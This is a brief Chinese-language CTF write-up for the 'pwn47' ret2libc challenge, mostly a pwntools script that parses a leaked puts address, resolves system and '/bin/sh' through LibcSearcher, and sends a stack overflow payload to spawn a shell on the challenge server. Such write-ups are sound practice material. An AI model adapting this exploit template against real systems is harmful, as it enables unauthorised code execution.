pwn47

ez ret2libc

检查保护，只开了代码执行保护，32位程序

观察主函数，几个函数和 /bin/sh 的地址都告诉了，直接进入到ret2libc的第二部分，puts是我们的老朋友了，也是第一个那就选puts来查找libc，一样的找到system的地址以及用他告诉的 /bin/sh 的地址即可获得权限。

这里要注意 puts 函数地址接收的代码编写，先接收到0x，再往后接收8位，以16进制存储，输出并进行比对检查。

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import *
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='pwn.challenge.ctf.show'
port=28148
file_name='pwn'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_libc)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    io.recvuntil(b'puts: 0x')
    puts_addr=int(io.recv(8),16)
    print("Puts_addr: ",hex(puts_addr))

    libc = LibcSearcher('puts',puts_addr)

    libc_base = puts_addr - libc.dump('puts')
    system_add = libc_base + libc.dump('system')
    bin_sh_add = libc_base + libc.dump('str_bin_sh')

    # libc_base = puts_addr - libc.symbols['puts']
    # system_add = libc_base + libc.symbols['system']
    # bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

    offset=0x9C

    payload = b'a' * (offset+4) + p32(system_add) + p32(0) + p32(bin_sh_add)
    io.sendlineafter(b'time:', payload)

    io.interactive()

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()